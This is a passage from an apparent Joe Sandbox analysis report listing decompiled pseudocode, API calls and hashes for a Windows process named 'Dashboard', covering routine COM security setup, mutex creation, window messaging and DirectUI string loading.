                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Proxy$Blanket$CopyH_prolog3Query
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3551063796-0
                                                                                                                    • Opcode ID: 4275012548692d04ac906b5d7a63ab59788de7de78710f4831b239a1407e0ced
                                                                                                                    • Instruction ID: 41903b7d7c64a8f5f21781c730ef36273c4b5e64886212cb6696ab2502826088
                                                                                                                    • Opcode Fuzzy Hash: 4275012548692d04ac906b5d7a63ab59788de7de78710f4831b239a1407e0ced
                                                                                                                    • Instruction Fuzzy Hash: C1311C71D0025AAFDF11DFA4C8848EEBBB8BB09314F144668E6A5F7291C7359E41CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E01009A67(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				signed int _t42;
                                                                                                                    				intOrPtr* _t43;
                                                                                                                    				intOrPtr* _t44;
                                                                                                                    				intOrPtr* _t49;
                                                                                                                    				signed int _t50;
                                                                                                                    				signed int _t52;
                                                                                                                    				signed int _t54;
                                                                                                                    				void* _t65;
                                                                                                                    
                                                                                                                    				E0100880F(E01015D38, __ebx, __edi, __esi);
                                                                                                                    				 *(_t65 - 0x24) =  *(_t65 - 0x24) | 0xffffffff;
                                                                                                                    				 *(_t65 - 0x20) =  *(_t65 - 0x20) | 0xffffffff;
                                                                                                                    				 *(_t65 - 0x1c) =  *(_t65 - 0x1c) | 0xffffffff;
                                                                                                                    				_t42 = _t65 - 0x24;
                                                                                                                    				 *(_t65 - 0x18) = 0x800;
                                                                                                                    				__imp__CoQueryProxyBlanket( *((intOrPtr*)(_t65 + 8)), _t42, _t65 - 0x20, _t65 - 0x1c, 0, 0, 0, _t65 - 0x18, 0x18);
                                                                                                                    				_t64 = _t42;
                                                                                                                    				 *(_t65 - 0x14) = 0;
                                                                                                                    				 *(_t65 - 4) = 0;
                                                                                                                    				if(_t64 >= 0) {
                                                                                                                    					_t54 = _t65 - 0x14;
                                                                                                                    					__imp__CoCopyProxy( *((intOrPtr*)(_t65 + 8)), _t54);
                                                                                                                    					_t64 = _t54;
                                                                                                                    				}
                                                                                                                    				 *((intOrPtr*)(_t65 - 0x10)) = 0;
                                                                                                                    				 *(_t65 - 4) = 1;
                                                                                                                    				if(_t64 >= 0) {
                                                                                                                    					_t49 =  *(_t65 - 0x14);
                                                                                                                    					_t50 =  *((intOrPtr*)( *_t49))(_t49, 0x1001e4c, _t65 - 0x10);
                                                                                                                    					_t64 = _t50;
                                                                                                                    					if(_t50 >= 0) {
                                                                                                                    						_t52 =  *(_t65 - 0x18) | 0x00000040;
                                                                                                                    						__imp__CoSetProxyBlanket( *((intOrPtr*)(_t65 - 0x10)),  *(_t65 - 0x24),  *(_t65 - 0x20),  *(_t65 - 0x1c),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x10)), 0, _t52);
                                                                                                                    						_t64 = _t52;
                                                                                                                    						if(_t52 >= 0) {
                                                                                                                    							_t64 = E0100922D(_t65 - 0x10,  *((intOrPtr*)(_t65 + 0x14)));
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				_t43 =  *((intOrPtr*)(_t65 - 0x10));
                                                                                                                    				 *(_t65 - 4) = 0;
                                                                                                                    				if(_t43 != 0) {
                                                                                                                    					 *((intOrPtr*)( *_t43 + 8))(_t43);
                                                                                                                    				}
                                                                                                                    				_t44 =  *(_t65 - 0x14);
                                                                                                                    				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
                                                                                                                    				if(_t44 != 0) {
                                                                                                                    					 *((intOrPtr*)( *_t44 + 8))(_t44);
                                                                                                                    				}
                                                                                                                    				return E010088FB(_t64);
                                                                                                                    			}











                                                                                                                    0x01009a6e
                                                                                                                    0x01009a73
                                                                                                                    0x01009a77
                                                                                                                    0x01009a7b
                                                                                                                    0x01009a90
                                                                                                                    0x01009a97
                                                                                                                    0x01009a9e
                                                                                                                    0x01009aa4
                                                                                                                    0x01009aa6
                                                                                                                    0x01009aab
                                                                                                                    0x01009aae
                                                                                                                    0x01009ab0
                                                                                                                    0x01009ab7
                                                                                                                    0x01009abd
                                                                                                                    0x01009abd
                                                                                                                    0x01009abf
                                                                                                                    0x01009ac4
                                                                                                                    0x01009ac8
                                                                                                                    0x01009aca
                                                                                                                    0x01009ad9
                                                                                                                    0x01009adb
                                                                                                                    0x01009adf
                                                                                                                    0x01009ae4
                                                                                                                    0x01009afb
                                                                                                                    0x01009b01
                                                                                                                    0x01009b05
                                                                                                                    0x01009b12
                                                                                                                    0x01009b12
                                                                                                                    0x01009b05
                                                                                                                    0x01009adf
                                                                                                                    0x01009b14
                                                                                                                    0x01009b19
                                                                                                                    0x01009b1c
                                                                                                                    0x01009b21
                                                                                                                    0x01009b21
                                                                                                                    0x01009b24
                                                                                                                    0x01009b27
                                                                                                                    0x01009b2d
                                                                                                                    0x01009b32
                                                                                                                    0x01009b32
                                                                                                                    0x01009b3c

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01009A6E
                                                                                                                    • CoQueryProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?), ref: 01009A9E
                                                                                                                    • CoCopyProxy.OLE32(?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 01009AB7
                                                                                                                    • CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,?,?,00000000,00000800), ref: 01009AFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Proxy$Blanket$CopyH_prolog3Query
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3551063796-0
                                                                                                                    • Opcode ID: 172314b953b9a7d1b148d2341d32dd89e29b9efacd5a817cc37285bc3b44fd09
                                                                                                                    • Instruction ID: be921c3d7fc8882958cd527e8d6fef1735bd3a2ad65cb2cbc1e46acedd93088f
                                                                                                                    • Opcode Fuzzy Hash: 172314b953b9a7d1b148d2341d32dd89e29b9efacd5a817cc37285bc3b44fd09
                                                                                                                    • Instruction Fuzzy Hash: 5B312D7190015AAFDF11DFD4C8848EEBBB9BB08364F544668E6A5F72A1C7358E01CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE ref: 0100CED4
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(?,00000000), ref: 0100CEDC
                                                                                                                      • Part of subcall function 0100C2F9: ?FindDescendent@Element@DirectUI@@QAEPAV12@G@Z.UXCORE(00000000,?,00000000,?,01012820,00000000,?,01012C67,00000000,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001), ref: 0100C30C
                                                                                                                    • ?RMLoadCompoundString@@YGIIPA_WIKPB_W@Z.UXCORE(?,?,00000104,0000000F,00000000,00000000), ref: 0100CF07
                                                                                                                    • ?RMLoadString@@YGIIPA_WIKPB_W@Z.UXCORE(?,?,00000104,0000000F,00000000,00000000), ref: 0100CF0F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Direct$Element@LoadString@@$CompoundDescendent@Element@2@FindHost@NativeV12@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 235335248-0
                                                                                                                    • Opcode ID: 8987c8f1a83f541c045d08b56a6c6f6a1a15be3daeecaf62f12a828ff5882efe
                                                                                                                    • Instruction ID: ad5c8f6db539d2950be04b08ad1a36d971ce72e0ce9874226a0ba5bcd37f306a
                                                                                                                    • Opcode Fuzzy Hash: 8987c8f1a83f541c045d08b56a6c6f6a1a15be3daeecaf62f12a828ff5882efe
                                                                                                                    • Instruction Fuzzy Hash: FA018471600119ABFB22EBA89908DFE77E8AB08304F1482A9F995D7181DA74DA058791
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E010072FA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t15;
                                                                                                                    				void* _t31;
                                                                                                                    				void* _t34;
                                                                                                                    				void* _t35;
                                                                                                                    				void* _t36;
                                                                                                                    
                                                                                                                    				_t36 = __eflags;
                                                                                                                    				_t31 = __edx;
                                                                                                                    				_push(4);
                                                                                                                    				E0100880F(E010161E4, __ebx, __edi, __esi);
                                                                                                                    				E01004D33(_t35 - 0x10, 0x101a5f0);
                                                                                                                    				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
                                                                                                                    				_t15 = E01007241(__ebx, __edi, __esi, _t36, _t35 + 8,  *((intOrPtr*)(_t35 + 8)));
                                                                                                                    				 *(_t35 - 4) = 1;
                                                                                                                    				E010061C3(__ebx, _t35 - 0x10, _t15);
                                                                                                                    				E01004925( *((intOrPtr*)(_t35 + 8)) + 0xfffffff0, _t31);
                                                                                                                    				_t25 =  *(_t35 - 0x10);
                                                                                                                    				_t34 = CreateMutexW(0, 0,  *(_t35 - 0x10));
                                                                                                                    				if(_t34 != 0 && GetLastError() == 0xb7) {
                                                                                                                    					CloseHandle(_t34);
                                                                                                                    					_t34 = 0;
                                                                                                                    				}
                                                                                                                    				E01004925(_t25 - 0x10, _t31);
                                                                                                                    				return E010088FB(_t34);
                                                                                                                    			}








                                                                                                                    0x010072fa
                                                                                                                    0x010072fa
                                                                                                                    0x010072fa
                                                                                                                    0x01007301
                                                                                                                    0x0100730e
                                                                                                                    0x01007316
                                                                                                                    0x0100731e
                                                                                                                    0x01007327
                                                                                                                    0x0100732b
                                                                                                                    0x01007336
                                                                                                                    0x0100733b
                                                                                                                    0x01007349
                                                                                                                    0x0100734d
                                                                                                                    0x0100735d
                                                                                                                    0x01007363
                                                                                                                    0x01007363
                                                                                                                    0x01007368
                                                                                                                    0x01007374

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01007301
                                                                                                                      • Part of subcall function 01007241: __EH_prolog3.LIBCMT ref: 01007248
                                                                                                                      • Part of subcall function 01007241: GetCurrentProcess.KERNEL32(00000008,?,00000010,01007323,?,?,00000004,010076E9,?), ref: 0100726C
                                                                                                                      • Part of subcall function 01007241: OpenProcessToken.ADVAPI32(00000000), ref: 01007273
                                                                                                                      • Part of subcall function 01007241: GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),00000000,00000000,?), ref: 01007292
                                                                                                                      • Part of subcall function 01007241: GetTokenInformation.ADVAPI32(00000002,0000000A(TokenIntegrityLevel),00000000,?,?), ref: 010072B0
                                                                                                                      • Part of subcall function 01007241: ??_V@YAXPAX@Z.MSVCR80 ref: 010072D3
                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,00000004,010076E9,?), ref: 01007343
                                                                                                                    • GetLastError.KERNEL32 ref: 0100734F
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0100735D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Token$H_prolog3InformationProcess$CloseCreateCurrentErrorHandleLastMutexOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2019100737-0
                                                                                                                    • Opcode ID: 303ce21a44c0d8aebc3015fff0c757b230a7f6c70e55e9dc2f267ba040c18f33
                                                                                                                    • Instruction ID: ae0a6d27d146b8f236d6626967311901c3c4471adb663e9ba840633361ef39d5
                                                                                                                    • Opcode Fuzzy Hash: 303ce21a44c0d8aebc3015fff0c757b230a7f6c70e55e9dc2f267ba040c18f33
                                                                                                                    • Instruction Fuzzy Hash: 8801F431900216ABEB13EBA0CC44BED3724BF20310F008415FAC5AA2C5CFB89A44CBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E0100C1EE(void* __ecx) {
                                                                                                                    				struct HWND__* _t7;
                                                                                                                    				int _t14;
                                                                                                                    
                                                                                                                    				_t7 =  *0x101a004; // 0x101a004
                                                                                                                    				if(_t7 != 0x101a004 && ( *(_t7 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    					_t4 = _t7 + 0x14; // 0x65637845
                                                                                                                    					_t5 = _t7 + 0x10; // 0x6c744143
                                                                                                                    					_t7 = E010049DE(_t7,  *_t5,  *_t4, 0x32, 0x1002308);
                                                                                                                    				}
                                                                                                                    				_t14 = 0;
                                                                                                                    				__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    				if(_t7 != 0) {
                                                                                                                    					PostMessageW(_t7, 0x10, 0, 0);
                                                                                                                    					PostThreadMessageW(GetCurrentThreadId(), 0x12, 0, 0);
                                                                                                                    				} else {
                                                                                                                    					_t14 = 0x8000ffff;
                                                                                                                    				}
                                                                                                                    				return _t14;
                                                                                                                    			}





                                                                                                                    0x0100c1f4
                                                                                                                    0x0100c1fe
                                                                                                                    0x0100c20d
                                                                                                                    0x0100c210
                                                                                                                    0x0100c213
                                                                                                                    0x0100c213
                                                                                                                    0x0100c21b
                                                                                                                    0x0100c21d
                                                                                                                    0x0100c225
                                                                                                                    0x0100c233
                                                                                                                    0x0100c244
                                                                                                                    0x0100c227
                                                                                                                    0x0100c227
                                                                                                                    0x0100c227
                                                                                                                    0x0100c24e

                                                                                                                    APIs
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE ref: 0100C21D
                                                                                                                    • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 0100C233
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0100C23D
                                                                                                                    • PostThreadMessageW.USER32 ref: 0100C244
                                                                                                                      • Part of subcall function 010049DE: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 010049F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PostThread$CurrentD__@@DirectHost@NativeTrace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3715929741-0
                                                                                                                    • Opcode ID: b6d016e896c8c75157042b5b4444f27d541605c29e8083bd4ef0f24638bfe6ae
                                                                                                                    • Instruction ID: ff4ca57f39e8e4e014842c23cb95a106e4c376755d47081b3510764b2937bba8
                                                                                                                    • Opcode Fuzzy Hash: b6d016e896c8c75157042b5b4444f27d541605c29e8083bd4ef0f24638bfe6ae
                                                                                                                    • Instruction Fuzzy Hash: 6CF0B431280240ABF7375B5AAE4CE573EA9EBD5752F064198F6C5C74D5CA79C400D720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E0100B339(void* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* __ebx;
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				void* __ebp;
                                                                                                                    				intOrPtr* _t104;
                                                                                                                    				signed int _t105;
                                                                                                                    				signed int _t106;
                                                                                                                    				intOrPtr* _t109;
                                                                                                                    				signed int _t110;
                                                                                                                    				intOrPtr _t111;
                                                                                                                    				signed int _t112;
                                                                                                                    				signed int _t113;
                                                                                                                    				signed int _t119;
                                                                                                                    				intOrPtr _t121;
                                                                                                                    				intOrPtr _t123;
                                                                                                                    				signed int _t125;
                                                                                                                    				intOrPtr _t128;
                                                                                                                    				signed int _t135;
                                                                                                                    				signed int _t137;
                                                                                                                    				intOrPtr _t138;
                                                                                                                    				intOrPtr _t140;
                                                                                                                    				signed int _t142;
                                                                                                                    				intOrPtr _t143;
                                                                                                                    				signed int _t145;
                                                                                                                    				signed int _t150;
                                                                                                                    				intOrPtr* _t151;
                                                                                                                    				signed int* _t169;
                                                                                                                    				void* _t174;
                                                                                                                    				intOrPtr* _t176;
                                                                                                                    				signed int _t178;
                                                                                                                    				void* _t180;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_t104 = _a8;
                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                    				if(_t104 != 0) {
                                                                                                                    					_t105 =  *((intOrPtr*)( *_t104))(_t104, 0x1001ef4,  &_v12);
                                                                                                                    					__eflags = _t105;
                                                                                                                    					_a8 = _t105;
                                                                                                                    					if(_t105 < 0) {
                                                                                                                    						L52:
                                                                                                                    						_t106 = _v12;
                                                                                                                    						__eflags = _t106;
                                                                                                                    						if(_t106 != 0) {
                                                                                                                    							 *((intOrPtr*)( *_t106 + 8))(_t106);
                                                                                                                    						}
                                                                                                                    						goto L54;
                                                                                                                    					}
                                                                                                                    					_t109 = _v12;
                                                                                                                    					_t166 =  &_v8;
                                                                                                                    					_t110 =  *((intOrPtr*)( *_t109 + 0x1c))(_t109,  &_v8);
                                                                                                                    					__eflags = _t110;
                                                                                                                    					_a8 = _t110;
                                                                                                                    					if(_t110 < 0) {
                                                                                                                    						goto L52;
                                                                                                                    					} else {
                                                                                                                    						_t111 =  *0x101a004; // 0x101a004
                                                                                                                    						__eflags = _t111 - 0x101a004;
                                                                                                                    						if(_t111 != 0x101a004) {
                                                                                                                    							__eflags =  *(_t111 + 0x1c) & 0x00000008;
                                                                                                                    							if(( *(_t111 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    								_t18 = _t111 + 0x14; // 0x65637845
                                                                                                                    								_t19 = _t111 + 0x10; // 0x6c744143
                                                                                                                    								E01008F04( *_t19,  *_t18, 0x2b, 0x1001e2c, _v8, _a12);
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						_t176 = _a4;
                                                                                                                    						_push(_v12);
                                                                                                                    						_t22 = _t176 + 0xcc; // 0xcc
                                                                                                                    						_t169 = _t22;
                                                                                                                    						_t112 = E01009917(_t169);
                                                                                                                    						__eflags = _t112;
                                                                                                                    						if(_t112 != 0) {
                                                                                                                    							_t113 =  *(_t176 + 0xd8);
                                                                                                                    							__eflags = _t113;
                                                                                                                    							if(_t113 == 0) {
                                                                                                                    								L43:
                                                                                                                    								_a8 = 0x8000ffff;
                                                                                                                    								L51:
                                                                                                                    								goto L52;
                                                                                                                    							}
                                                                                                                    							 *((intOrPtr*)( *_t113 + 0x24))(_t113, _v8, _a12);
                                                                                                                    							_t43 = _t176 + 0xa4; // 0xa4
                                                                                                                    							E01013491(_t43, _t166, _v8);
                                                                                                                    							_t150 =  *(_t176 + 0xd8);
                                                                                                                    							_t45 = _t176 + 0xa4; // 0xa4
                                                                                                                    							_t159 = _t45;
                                                                                                                    							 *((intOrPtr*)( *_t150 + 0x28))(_t150, E01012F64(_t45, _t180),  *0x100207c);
                                                                                                                    							__eflags = _a12 - 0xbc2;
                                                                                                                    							if(_a12 != 0xbc2) {
                                                                                                                    								_t151 = 0x101a004;
                                                                                                                    							} else {
                                                                                                                    								_t140 =  *0x101a004; // 0x101a004
                                                                                                                    								_t151 = 0x101a004;
                                                                                                                    								__eflags = _t140 - 0x101a004;
                                                                                                                    								if(_t140 != 0x101a004) {
                                                                                                                    									__eflags =  *(_t140 + 0x1c) & 0x00000008;
                                                                                                                    									if(( *(_t140 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    										_t51 = _t140 + 0x14; // 0x65637845
                                                                                                                    										_t52 = _t140 + 0x10; // 0x6c744143
                                                                                                                    										E01006C01( *_t52,  *_t51, 0x2d, 0x1001e2c, _v8);
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								 *((char*)(_t176 + 0x88)) = 1;
                                                                                                                    							}
                                                                                                                    							_t119 =  *((intOrPtr*)( *_t176 + 0x4c))(_t176);
                                                                                                                    							__eflags = _t119;
                                                                                                                    							if(_t119 == 0) {
                                                                                                                    								L31:
                                                                                                                    								_t68 = _t176 + 0xcc; // 0xcc
                                                                                                                    								E0100950A(_t68, 0);
                                                                                                                    								_t121 =  *0x101a004; // 0x101a004
                                                                                                                    								__eflags = _t121 - _t151;
                                                                                                                    								if(_t121 == _t151) {
                                                                                                                    									L34:
                                                                                                                    									_t174 = 0x1001e2c;
                                                                                                                    									L35:
                                                                                                                    									_t75 = _t176 + 0x30; // 0x30
                                                                                                                    									E0100A313(_t75, _v12, 0x1001dac);
                                                                                                                    									_t123 =  *0x101a004; // 0x101a004
                                                                                                                    									__eflags = _t123 - _t151;
                                                                                                                    									if(_t123 != _t151) {
                                                                                                                    										__eflags =  *(_t123 + 0x1c) & 0x00000008;
                                                                                                                    										if(( *(_t123 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    											_t80 = _t123 + 0x14; // 0x65637845
                                                                                                                    											_t81 = _t123 + 0x10; // 0x6c744143
                                                                                                                    											E01006C01( *_t81,  *_t80, 0x30, _t174, _v8);
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    									__eflags = _a12;
                                                                                                                    									if(_a12 < 0) {
                                                                                                                    										_t85 = _t176 + 0x90;
                                                                                                                    										 *_t85 =  *(_t176 + 0x90) + 1;
                                                                                                                    										__eflags =  *_t85;
                                                                                                                    									} else {
                                                                                                                    										 *((intOrPtr*)(_t176 + 0x8c)) =  *((intOrPtr*)(_t176 + 0x8c)) + 1;
                                                                                                                    									}
                                                                                                                    									_t125 =  *((intOrPtr*)( *_t176 + 0x44))(_t176);
                                                                                                                    									__eflags = _t125;
                                                                                                                    									if(_t125 == 0) {
                                                                                                                    										__eflags =  *((char*)(_t176 + 0xb4));
                                                                                                                    										if( *((char*)(_t176 + 0xb4)) == 0) {
                                                                                                                    											_a8 =  *((intOrPtr*)( *_t176 + 0xbc))();
                                                                                                                    										} else {
                                                                                                                    											_t128 =  *0x101a004; // 0x101a004
                                                                                                                    											__eflags = _t128 - _t151;
                                                                                                                    											if(_t128 != _t151) {
                                                                                                                    												__eflags =  *(_t128 + 0x1c) & 0x00000008;
                                                                                                                    												if(( *(_t128 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    													_t95 = _t128 + 0x14; // 0x65637845
                                                                                                                    													_t96 = _t128 + 0x10; // 0x6c744143
                                                                                                                    													E010049DE(_t128,  *_t96,  *_t95, 0x31, _t174);
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    											 *((char*)(_t176 + 0xb5)) = 1;
                                                                                                                    										}
                                                                                                                    										goto L51;
                                                                                                                    									} else {
                                                                                                                    										_t178 =  *(_t176 + 0xd8);
                                                                                                                    										__eflags = _t178;
                                                                                                                    										if(_t178 != 0) {
                                                                                                                    											 *((intOrPtr*)( *_t178 + 0x14))(_t178);
                                                                                                                    											goto L51;
                                                                                                                    										}
                                                                                                                    										goto L43;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								__eflags =  *(_t121 + 0x1c) & 0x00000008;
                                                                                                                    								if(( *(_t121 + 0x1c) & 0x00000008) == 0) {
                                                                                                                    									goto L34;
                                                                                                                    								}
                                                                                                                    								_t174 = 0x1001e2c;
                                                                                                                    								_t72 = _t121 + 0x14; // 0x65637845
                                                                                                                    								_t73 = _t121 + 0x10; // 0x6c744143
                                                                                                                    								E010049DE(_t121,  *_t73,  *_t72, 0x2f, 0x1001e2c);
                                                                                                                    								goto L35;
                                                                                                                    							} else {
                                                                                                                    								__eflags =  *(_t176 + 0xd0);
                                                                                                                    								if( *(_t176 + 0xd0) != 0) {
                                                                                                                    									goto L31;
                                                                                                                    								}
                                                                                                                    								__eflags = _a12;
                                                                                                                    								if(_a12 < 0) {
                                                                                                                    									goto L31;
                                                                                                                    								}
                                                                                                                    								__eflags = _a12 - 0xbc2;
                                                                                                                    								if(_a12 == 0xbc2) {
                                                                                                                    									goto L31;
                                                                                                                    								}
                                                                                                                    								E0100ACC8(_t159);
                                                                                                                    								_t135 = E01014BC5(_t151, 0xbc2, _t176, __eflags, _v12);
                                                                                                                    								__eflags = _t135;
                                                                                                                    								if(_t135 == 0) {
                                                                                                                    									goto L31;
                                                                                                                    								}
                                                                                                                    								_t59 = _t176 + 0xd0; // 0xd0
                                                                                                                    								_t137 = E0100920F(_v12, _t59);
                                                                                                                    								__eflags = _t137;
                                                                                                                    								_a8 = _t137;
                                                                                                                    								if(_t137 < 0) {
                                                                                                                    									goto L51;
                                                                                                                    								}
                                                                                                                    								_t138 =  *0x101a004; // 0x101a004
                                                                                                                    								__eflags = _t138 - _t151;
                                                                                                                    								if(_t138 != _t151) {
                                                                                                                    									__eflags =  *(_t138 + 0x1c) & 0x00000008;
                                                                                                                    									if(( *(_t138 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    										_t66 = _t138 + 0x14; // 0x65637845
                                                                                                                    										_t67 = _t138 + 0x10; // 0x6c744143
                                                                                                                    										E01006C01( *_t67,  *_t66, 0x2e, 0x1001e2c, _v8);
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								goto L31;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						_t142 =  *_t169;
                                                                                                                    						_a12 = _a12 & 0x00000000;
                                                                                                                    						__eflags = _t142;
                                                                                                                    						if(_t142 == 0) {
                                                                                                                    							L10:
                                                                                                                    							_t143 =  *0x101a004; // 0x101a004
                                                                                                                    							__eflags = _t143 - 0x101a004;
                                                                                                                    							if(_t143 != 0x101a004) {
                                                                                                                    								__eflags =  *(_t143 + 0x1c) & 0x00000008;
                                                                                                                    								if(( *(_t143 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    									_t33 = _t143 + 0x14; // 0x65637845
                                                                                                                    									_t34 = _t143 + 0x10; // 0x6c744143
                                                                                                                    									E01008E3D( *_t34,  *_t33, 0x2c, 0x1001e2c, _v8, _a12);
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							_t35 =  &_a8;
                                                                                                                    							 *_t35 = _a8 & 0x00000000;
                                                                                                                    							__eflags =  *_t35;
                                                                                                                    							L14:
                                                                                                                    							__imp__#6(_a12);
                                                                                                                    							goto L51;
                                                                                                                    						}
                                                                                                                    						_t145 =  *((intOrPtr*)( *_t142 + 0x1c))(_t142,  &_a12);
                                                                                                                    						__eflags = _t145;
                                                                                                                    						_a8 = _t145;
                                                                                                                    						if(_t145 < 0) {
                                                                                                                    							goto L14;
                                                                                                                    						}
                                                                                                                    						goto L10;
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_a8 = 0x80070057;
                                                                                                                    					L54:
                                                                                                                    					__imp__#6(_v8);
                                                                                                                    					return _a8;
                                                                                                                    				}
                                                                                                                    			}




































                                                                                                                    0x0100b33e
                                                                                                                    0x0100b33f
                                                                                                                    0x0100b340
                                                                                                                    0x0100b343
                                                                                                                    0x0100b347
                                                                                                                    0x0100b34d
                                                                                                                    0x0100b367
                                                                                                                    0x0100b369
                                                                                                                    0x0100b36b
                                                                                                                    0x0100b36e
                                                                                                                    0x0100b5fc
                                                                                                                    0x0100b5fc
                                                                                                                    0x0100b5ff
                                                                                                                    0x0100b601
                                                                                                                    0x0100b606
                                                                                                                    0x0100b606
                                                                                                                    0x00000000
                                                                                                                    0x0100b601
